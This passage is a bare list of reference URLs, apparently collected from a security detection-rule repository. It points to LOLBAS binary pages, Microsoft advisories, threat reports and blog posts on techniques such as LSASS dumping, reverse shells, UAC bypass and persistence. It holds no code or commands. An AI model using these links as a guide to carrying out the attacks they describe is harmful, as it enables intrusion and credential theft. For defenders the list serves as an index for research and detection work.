ithub.io/lolbas/Binaries/Microsoft.Workflow.Compiler/\nhttps://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/\nhttps://lolbas-project.github.io/lolbas/Binaries/Msdt/\nhttps://lolbas-project.github.io/lolbas/Binaries/Msedge/\nhttps://lolbas-project.github.io/lolbas/Binaries/msedge_proxy/\nhttps://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/\nhttps://lolbas-project.github.io/lolbas/Binaries/Msiexec/\nhttps://lolbas-project.github.io/lolbas/Binaries/Odbcconf/\nhttps://lolbas-project.github.io/lolbas/Binaries/OfflineScannerShell/\nhttps://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/\nhttps://lolbas-project.github.io/lolbas/Binaries/Pcalua/\nhttps://lolbas-project.github.io/lolbas/Binaries/Pcwrun/\nhttps://lolbas-project.github.io/lolbas/Binaries/Pktmon/\nhttps://lolbas-project.github.io/lolbas/Binaries/Presentationhost/\nhttps://lolbas-project.github.io/lolbas/Binaries/Print/\nhttps://lolbas-project.github.io/lolbas/Binaries/PrintBrm/\nhttps://lolbas-project.github.io/lolbas/Binaries/Provlaunch/\nhttps://lolbas-project.github.io/lolbas/Binaries/Psr/\nhttps://lolbas-project.github.io/lolbas/Binaries/Rasautou/\nhttps://lolbas-project.github.io/lolbas/Binaries/Rdrleakdiag/\nhttps://lolbas-project.github.io/lolbas/Binaries/Regasm/\nhttps://lolbas-project.github.io/lolbas/Binaries/Regedit/\nhttps://lolbas-project.github.io/lolbas/Binaries/Regini/\nhttps://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/\nhttps://lolbas-project.github.io/lolbas/Binaries/Regsvcs/\nhttps://lolbas-project.github.io/lolbas/Binaries/Regsvr32/\nhttps://lolbas-project.github.io/lolbas/Binaries/Replace/\nhttps://lolbas-project.github.io/lolbas/Binaries/Rpcping/\nhttps://lolbas-project.github.io/lolbas/Binaries/Rundll32\nhttps://lolbas-project.github.io/lolbas/Binaries/Runexehelper/\nhttps://lolbas-project.github.io/lolbas/Binaries/Runonce/\nhttps://lolbas-project.github.io/lolbas/Binaries/Runscripthelper/\nhttps://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/\nhttps://lolbas-project.github.io/lolbas/Binaries/Setres/\nhttps://lolbas-project.github.io/lolbas/Binaries/Ssh/\nhttps://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/\nhttps://lolbas-project.github.io/lolbas/Binaries/Tar/\nhttps://lolbas-project.github.io/lolbas/Binaries/Teams/\nhttps://lolbas-project.github.io/lolbas/Binaries/Ttdinject/\nhttps://lolbas-project.github.io/lolbas/Binaries/Tttracer/\nhttps://lolbas-project.github.io/lolbas/Binaries/Unregmp2/\nhttps://lolbas-project.github.io/lolbas/Binaries/Vbc/\nhttps://lolbas-project.github.io/lolbas/Binaries/Verclsid/\nhttps://lolbas-project.github.io/lolbas/Binaries/Wbadmin/\nhttps://lolbas-project.github.io/lolbas/Binaries/Winget/\nhttps://lolbas-project.github.io/lolbas/Binaries/Wlrmdr/\nhttps://lolbas-project.github.io/lolbas/Binaries/Wmic/\nhttps://lolbas-project.github.io/lolbas/Binaries/Wsreset\nhttps://lolbas-project.github.io/lolbas/Binaries/Wsreset/\nhttps://lolbas-project.github.io/lolbas/Binaries/Xwizard/\nhttps://lolbas-project.github.io/lolbas/HonorableMentions/GfxDownloadWrapper/\nhttps://lolbas-project.github.io/lolbas/Libraries/Desk/\nhttps://lolbas-project.github.io/lolbas/Libraries/Pcwutl/\nhttps://lolbas-project.github.io/lolbas/Libraries/Setupapi/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Coregen/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/DefaultPack/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Devinit/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Mftrace/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/ProtocolHandler/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/VSIISExeLauncher/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Vsjitdebugger/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/\nhttps://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/\nhttps://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/\nhttps://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/\nhttps://lolbas-project.github.io/lolbas/Scripts/Manage-bde/\nhttps://lolbas-project.github.io/lolbas/Scripts/Pubprn/\nhttps://lolbas-project.github.io/lolbas/Scripts/UtilityFunctions/\nhttps://lolbas-project.github.io/lolbas/Scripts/Winrm/\nhttps://loldrivers.io/\nhttps://lots-project.com/site/2a2e617a75726566642e6e6574\nhttps://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html\nhttps://m365internals.com/2021/07/13/what-ive-learned-from-doing-a-year-of-cloud-forensics-in-azure-ad/\nhttps://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/\nhttps://malpedia.caad.fkie.fraunhofer.de/actor/anthropoid_spider\nhttps://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset\nhttps://malware.guide/browser-hijacker/remove-onelaunch-virus/\nhttps://malware.news/t/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/72170\nhttps://man.freebsd.org/cgi/man.cgi?pwd_mkdb\nhttps://man.openbsd.org/ssh_config#LocalCommand\nhttps://man.openbsd.org/ssh_config#ProxyCommand\nhttps://man7.org/linux/man-pages/man1/ncat.1.html\nhttps://man7.org/linux/man-pages/man1/passwd.1.html\nhttps://man7.org/linux/man-pages/man2/mknod.2.html\nhttps://man7.org/linux/man-pages/man7/bpf-helpers.7.html\nhttps://man7.org/linux/man-pages/man8/getcap.8.html\nhttps://man7.org/linux/man-pages/man8/kmod.8.html\nhttps://man7.org/linux/man-pages/man8/ld.so.8.html\nhttps://mango.pdf.zone/stealing-chrome-cookies-without-a-password\nhttps://manpages.debian.org/unstable/ecasound/ecasound.1.en.html\nhttps://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b\nhttps://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf\nhttps://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF\nhttps://media.defense.gov/2021/Jul/19/2002805003/-1/-1/1/CSA_CHINESE_STATE-SPONSORED_CYBER_TTPS.PDF\nhttps://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF\nhttps://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf\nhttps://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf\nhttps://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072\nhttps://medium.com/@ahmed.moh.farou2/fake-captcha-campaign-on-arabic-pirated-movie-sites-delivers-lumma-stealer-4f203f7adabf\nhttps://medium.com/@blueteamops/shimcache-flush-89daff28d15e\nhttps://medium.com/@boutnaru/the-windows-foreniscs-journey-run-mru-run-dialog-box-most-recently-used-57375a02d724\nhttps://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4\nhttps://medium.com/@cyberjyot/t1218-008-dll-execution-using-odbcconf-exe-803fa9e08dac\nhttps://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01\nhttps://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83\nhttps://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6\nhttps://medium.com/@huskyhacks.mk/we-put-a-c2-in-your-notetaking-app-offensivenotion-3e933bace332\nhttps://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d\nhttps://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961\nhttps://medium.com/@logicbomb_1/bugbounty-how-i-was-able-to-download-the-source-code-of-indias-largest-telecom-service-52cf5c5640a1\nhttps://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf\nhttps://medium.com/@malwaredancer/lockergoga-input-arguments-ipc-communication-and-others-bd4e5a7ba80a\nhttps://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf\nhttps://medium.com/@mvelazco/hunting-for-samaccountname-spoofing-cve-2021-42287-and-domain-controller-impersonation-f704513c8a45\nhttps://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6\nhttps://medium.com/@NullByteWht/hacking-macos-how-to-dump-1password-keepassx-lastpass-passwords-in-plaintext-723c5b1c311b\nhttps://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f\nhttps://medium.com/@olafhartong/sysmon-14-0-fileblockexecutable-13d7ba3dff3e\nhttps://medium.com/@olafhartong/sysmon-15-0-file-executable-detected-40fd64349f36\nhttps://medium.com/@petehouston/upload-files-with-curl-93064dcccc76\nhttps://medium.com/@redfanatic7/running-kali-linux-on-windows-51ad95166e6e\nhttps://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983\nhttps://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191\nhttps://medium.com/@seifeddinerajhi/kubernetes-rbac-privilege-escalation-exploits-and-mitigations-26c07629eeab\nhttps://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1\nhttps://medium.com/@shaherzakaria8/downloading-trojan-lumma-infostealer-through-capatcha-1f25255a0e71\nhttps://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae\nhttps://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf\nhttps://medium.com/falconforce/falconfriday-detecting-active-directory-data-collection-0xff21-c22d1a57494c\nhttps://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf\nhttps://medium.com/falconforce/falconfriday-direct-system-calls-and-cobalt-strike-bofs-0xff14-741fa8e1bdd6\nhttps://medium.com/geekculture/text4shell-exploit-walkthrough-ebc02a01f035\nhttps://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1\nhttps://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63\nhttps://medium.com/r3d-buck3t/red-teaming-in-cloud-leverage-azure-frontdoor-cdn-for-c2-redirectors-79dd9ca98178\nhttps://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3\nhttps://medium.com/system-weakness/detecting-as-rep-roasting-attacks-b5b3965f9714\nhttps://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2\nhttps://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e\nhttps://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16\nhttps://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997\nhttps://medium.com/walmartglobaltech/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926\nhttps://mez0.cc/posts/cobaltstrike-powershell-exec/\nhttps://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html\nhttps://mgreen27.github.io/posts/2019/05/12/BinaryRename.html\nhttps://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html\nhttps://micahbabinski.medium.com/detecting-onenote-one-malware-delivery-407e9321ecf0\nhttps://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462\nhttps://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/container%20service%20account/\nhttps://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Data%20destruction/\nhttps://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Exec%20into%20container/\nhttps://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Pod%20or%20container%20name%20similarily/\nhttps://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Sidecar%20Injection/\nhttps://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Writable%20hostPath%20mount/\nhttps://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/\nhttps://mn3m.info/posts/suid-vs-capabilities/\nhttps://mobile.twitter.com/0gtweet/status/1564131230941122561\nhttps://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/\nhttps://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw\nhttps://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186\nhttps://mpgn.gitbook.io/crackmapexec/smb-protocol/authentication/checking-credentials-local\nhttps://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass\nhttps://mr0range.com/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22\nhttps://mraddon.blog/2017/03/20/confluence-trick-to-create-pages-from-blueprint-templates/\nhttps://mrd0x.com/sentinelone-persistence-via-menu-context/\nhttps://mrd0x.com/stealing-tokens-from-office-applications/\nhttps://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx\nhttps://msdn.microsoft.com/en-us/library/cc220234.aspx\nhttps://msdn.microsoft.com/powershell/reference/5.1/microsoft.powershell.utility/Invoke-WebRequest\nhttps://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/\nhttps://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444\nhttps://msrc.microsoft.com/update-guide/vulnerability/ADV170021\nhttps://msrc.microsoft.com/update-guide/vulnerability/ADV210003\nhttps://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675\nhttps://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527\nhttps://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942\nhttps://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444\nhttps://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42321\nhttps://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809\nhttps://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190\nhttps://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41120\nhttps://my.f5.com/manage/s/article/K589\nhttps://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90\nhttps://nasbench.medium.com/finding-forensic-goodness-in-obscure-windows-event-logs-60e978ea45a3\nhttps://nasbench.medium.com/lolbined-using-kaspersky-endpoint-security-kes-installer-to-execute-arbitrary-commands-1c999f1b7fea\nhttps://nasbench.medium.com/understanding-detecting-c2-frameworks-babyshark-641be4595845\nhttps://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08\nhttps://networkraptor.blogspot.com/2015/01/user-agent-strings.html\nhttps://news.sophos.com/en-us/2019/07/18/a-new-equation-editor-exploit-goes-commercial-as-maldoc-attacks-using-it-spike/\nhttps://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/\nhttps://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/\nhttps://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/\nhttps://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/\nhttps://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/\nhttps://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/\nhttps://news.sophos.com/en-us/2022/02/01/solarmarker-campaign-used-novel-registry-changes-to-establish-persistence/?cmp=30728\nhttps://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/\nhttps://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related/\nhttps://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/\nhttps://news.sophos.com/en-us/2024/06/05/operation-crimson-palace-a-technical-deep-dive\nhttps://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/\nhttps://ngrok.com/\nhttps://ngrok.com/docs\nhttps://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent\nhttps://nmap.org/\nhttps://nmap.org/ncat/\nhttps://nodejs.org/api/cli.html\nhttps://nored0x.github.io/red-teaming/office-persistence/#what-is-a-wll-file\nhttps://notebook.community/Cyb3rWard0g/HELK/docker/helk-jupyter/notebooks/sigma/proxy_ursnif_malware\nhttps://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/\nhttps://nsudo.m2team.org/en-us/\nhttps://nullsec.us/windows-event-log-audit-cve/\nhttps://nvd.nist.gov/vuln/detail/cve-2021-1675\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-26084\nhttps://nvd.nist.gov/vuln/detail/cve-2021-34527\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-41773\nhttps://nvd.nist.gov/vuln/detail/CVE-2023-2283\nhttps://nvd.nist.gov/vuln/detail/CVE-2024-3400\nhttps://nvd.nist.gov/vuln/detail/CVE-2025-2825\nhttps://nvd.nist.gov/vuln/detail/CVE-2025-30406\nhttps://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf\nhttps://nwgat.ninja/getting-system-information-with-wmic-on-windows/\nhttps://nxlog.co/documentation/nxlog-user-guide/applocker.html\nhttps://o365blog.com/aadinternals/\nhttps://o365blog.com/post/aadbackdoor/\nhttps://o365blog.com/post/adfs/\nhttps://o365blog.com/post/hybridhealthagent/\nhttps://objective-see.org/blog/blog_0x1E.html\nhttps://objective-see.org/blog/blog_0x4B.html\nhttps://objective-see.org/blog/blog_0x62.html\nhttps://objective-see.org/blog/blog_0x68.html\nhttps://objective-see.org/blog/blog_0x6D.html\nhttps://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/\nhttps://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/\nhttps://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/\nhttps://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/\nhttps://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/\nhttps://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/\nhttps://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/\nhttps://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm\nhttps://old.zeek.org/zeekweek2019/slides/bzar.pdf\nhttps://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/\nhttps://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow\nhttps://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\nhttps://outflank.nl/blog/2018/01/16/hunting-for-evil-detect-macros-being-executed/\nhttps://owasp.org/www-community/vulnerabilities/Expression_Language_Injection\nhttps://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing\nhttps://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf\nhttps://packetstormsecurity.com/files/166692/Windows-User-Profile-Service-Privlege-Escalation.html\nhttps://paste.cryptolaemus.com/emotet/2020/12/22/emotet-malware-IoCs_12-22-20.html\nhttps://patrick-bareiss.com/detecting-local-user-creation-in-ad-with-sigma/\nhttps://pberba.github.io/security/2021/11/23/linux-threat-hunting-for-persistence-account-creation-manipulation/\nhttps://pbs.twimg.com/media/EF3yLGoWkAEGeLa?format=jpg\nhttps://pbs.twimg.com/media/FtYbfsDXoAQ1Y8M?format=jpg&name=large\nhttps://pentest.blog/windows-privilege-escalation-methods-for-pentesters/\nhttps://pentester.land/tutorials/2018/10/25/source-code-disclosure-via-exposed-git-folder.html\nhttps://pentestlab.blog/2017/03/30/weak-service-permissions/\nhttps://pentestlab.blog/2017/03/31/insecure-registry-permissions/\nhttps://pentestlab.blog/2017/04/13/hot-potato/\nhttps://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/\nhttps://pentestlab.blog/2018/05/15/lateral-movement-winrm/\nhttps://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/\nhttps://pentestlab.blog/2019/10/21/persistence-security-support-provider/\nhttps://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/\nhttps://pentestlab.blog/2020/01/22/persistence-modify-existing-service/\nhttps://pentestlab.blog/2020/02/10/credential-access-password-filter-dll/\nhttps://pentestlab.blog/2020/02/24/parent-pid-spoofing/\nhttps://pentestlab.blog/2020/07/06/indirect-command-execution/\nhttps://pentestlab.blog/2022/02/14/persistence-notepad-plugins/\nhttps://pentestlab.blog/tag/ntds-dit/\nhttps://pentestlab.blog/tag/sharpmove/\nhttps://pentestlab.blog/tag/svchost/\nhttps://pentestlaboratories.com/2021/12/08/process-ghosting/\nhttps://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet\nhttps://perishablepress.com/blacklist/ua-2013.txt\nhttps://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor\nhttps://persistence-info.github.io/Data/aedebug.html\nhttps://persistence-info.github.io/Data/amsi.html\nhttps://persistence-info.github.io/Data/autodialdll.html\nhttps://persistence-info.github.io/Data/codesigning.html\nhttps://persistence-info.github.io/Data/diskcleanuphandler.html\nhttps://persistence-info.github.io/Data/hhctrl.html\nhttps://persistence-info.github.io/Data/htmlhelpauthor.html\nhttps://persistence-info.github.io/Data/ifilters.html\nhttps://persistence-info.github.io/Data/lsaaextension.html\nhttps://persistence-info.github.io/Data/mpnotify.html\nhttps://persistence-info.github.io/Data/naturallanguage6.html\nhttps://persistence-info.github.io/Data/powershellprofile.html\nhttps://persistence-info.github.io/Data/recyclebin.html\nhttps://persistence-info.github.io/Data/userinitmprlogonscript.html\nhttps://persistence-info.github.io/Data/wer_debugger.html\nhttps://persistence-info.github.io/Data/windowsterminalprofile.html\nhttps://persistence-info.github.io/Data/wpbbin.html\nhttps://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1\nhttps://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd\nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708\nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388\nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472\nhttps://portmap.io/\nhttps://portswigger.net/web-security/cross-site-scripting/contexts\nhttps://positive.security/blog/ms-officecmd-rce\nhttps://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs\nhttps://posts.specterops.io/abstracting-scheduled-tasks-3b6451f6a1c5\nhttps://posts.specterops.io/an-introduction-to-manual-active-directory-querying-with-dsquery-and-ldapsearch-84943c13d7eb?gi=41b97a644843\nhttps://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404\nhttps://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb\nhttps://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0\nhttps://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec\nhttps://posts.specterops.io/covenant-v0-5-eee0507b85ba\nhttps://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462\nhttps://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1\nhttps://posts.specterops.io/lateral-movement-abuse-the-power-of-dcom-excel-application-3c016d0d9922\nhttps://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992\nhttps://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5\nhttps://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124\nhttps://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e\nhttps://posts.specterops.io/passwordless-persistence-and-privilege-escalation-in-azure-98a01310be3f\nhttps://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30\nhttps://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650\nhttps://powersploit.readthedocs.io/en/latest/Persistence/Install-SSP/\nhttps://powersploit.readthedocs.io/en/latest/Privesc/Write-HijackDll/\nhttps://powersploit.readthedocs.io/en/stable/Recon/README\nhttps://pro.twitter.com/JaromirHorejsi/status/1795001037746761892/photo/2\nhttps://processhacker.sourceforge.io/\nhttps://projectdiscovery.io/blog/crushftp-authentication-bypass\nhttps://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf\nhttps://pub-7cb8ac806c1b4c4383e585c474a24719.r2.dev/116309e7121bc8b0e66e4166c06f7b818e1d3629.pdf\nhttps://pypi.org/project/scapy/\nhttps://ragged-lab.blogspot.com/2020/06/capturing-pcap-driver-installations.html#more\nhttps://ragged-lab.blogspot.com/2020/07/webshells-automating-reconnaissance.html\nhttps://rastamouse.me/ntlm-relaying-via-cobalt-strike/\nhttps://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf\nhttps://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf\nhttps://rclone.org/\nhttps://reaqta.com/2017/11/short-journey-darkvnc/\nhttps://reaqta.com/2017/12/mavinject-microsoft-injector/\nhttps://reconshell.com/winpwn-tool-for-internal-windows-pentesting-and-ad-security/\nhttps://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/\nhttps://redcanary.com/blog/applescript/\nhttps://redcanary.com/blog/blackbyte-ransomware/\nhttps://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social\nhttps://redcanary.com/blog/blue-mockingbird-cryptominer/\nhttps://redcanary.com/blog/child-processes/\nhttps://redcanary.com/blog/chromeloader/\nhttps://redcanary.com/blog/clipping-silver-sparrows-wings/\nhttps://redcanary.com/blog/detecting-attacks-leveraging-the-net-framework/\nhttps://redcanary.com/blog/ebpf-malware/\nhttps://redcanary.com/blog/email-forwarding-rules/\nhttps://redcanary.com/blog/gootloader/\nhttps://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/\nhttps://redcanary.com/blog/intelligence-insights-april-2022/\nhttps://redcanary.com/blog/intelligence-insights-december-2021\nhttps://redcanary.com/blog/intelligence-insights-november-2021/\nhttps://redcanary.com/blog/intelligence-insights-october-2021/\nhttps://redcanary.com/blog/lateral-movement-winrm-wmi/\nhttps://redcanary.com/blog/mac-application-bundles/\nhttps://redcanary.com/blog/misbehaving-rats